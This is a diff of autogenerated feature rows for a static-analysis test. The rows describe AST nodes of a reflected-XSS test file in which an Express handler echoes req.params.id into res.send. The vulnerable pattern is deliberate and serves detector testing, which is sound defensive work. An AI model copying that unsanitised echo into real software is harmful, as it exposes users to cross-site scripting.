autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:25:16:58 | 'Conten ... n/json' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:41:16:58 | 'application/json' | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:41:16:58 | 'application/json' | InputAccessPathFromCallee | 1.Content-Type | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:41:16:58 | 'application/json' | InputArgumentIndex | 1 | @@ -20391,6 +135746,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:41:16:58 | 'application/json' | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:41:16:58 | 'application/json' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:16:41:16:58 | 'application/json' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:7 | res | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:12 | res.send | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | res.sen ... ams.id) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:5:17:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:9:17:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:9:17:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:9:17:12 | send | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:9:17:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:9:17:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:20 | "FOO: " | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20399,6 +135785,57 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:14:17:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:26 | req | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:33 | req.params | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:36 | req.params.id | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:36 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:24:17:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:28:17:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:28:17:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:28:17:33 | params | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:28:17:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:28:17:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:35:17:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:35:17:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:35:17:36 | id | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:35:17:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:17:35:17:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:7 | res | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:17 | res.writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:17 | res.writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:17 | res.writeHead | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:17 | res.writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:17 | res.writeHead | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | exceptional return of res.writeHead(404) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | exceptional return of res.writeHead(404) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | exceptional return of res.writeHead(404) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | exceptional return of res.writeHead(404) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | exceptional return of res.writeHead(404) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | res.writeHead(404) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | res.writeHead(404) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | res.writeHead(404) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | res.writeHead(404) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:5:19:22 | res.writeHead(404) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:9:19:17 | writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:9:19:17 | writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:9:19:17 | writeHead | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:9:19:17 | writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:9:19:17 | writeHead | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:19:19:21 | 404 | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:19:19:21 | 404 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:19:19:21 | 404 | contextFunctionInterfaces | textContentType() | @@ -20407,6 +135844,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:19:19:21 | 404 | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:19:19:21 | 404 | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:19:19:19:21 | 404 | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:7 | res | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:12 | res.send | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | res.sen ... ams.id) | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:5:20:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:9:20:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:9:20:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:9:20:12 | send | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:9:20:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:9:20:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:20 | "FOO: " | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20415,6 +135883,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:26 | req | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:33 | req.params | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:28:20:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:28:20:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:28:20:33 | params | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:28:20:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:28:20:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:35:20:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:35:20:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:35:20:36 | id | enclosingFunctionBody | req res whatever res writeHead 200 Content-Type application/json res send FOO: req params id res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:35:20:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:20:35:20:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:25:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:25:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:25:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:25:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:25:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:25:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:33:2 | app.get ... JSON\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:33:2 | app.get ... JSON\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:33:2 | app.get ... JSON\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:33:2 | exceptional return of app.get ... JSON\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:33:2 | exceptional return of app.get ... JSON\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:1:33:2 | exceptional return of app.get ... JSON\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:5:25:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:5:25:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:5:25:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:9:25:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:9:25:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:9:25:19 | '/user/:id' | calleeImports | express | @@ -20422,6 +135931,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:9:25:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:9:25:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:9:25:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:25:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:25:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:25:21 | this | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:25:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:25:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | functio ... JSON\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | functio ... JSON\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:25:22:33:1 | functio ... JSON\\n} | calleeImports | express | @@ -20429,6 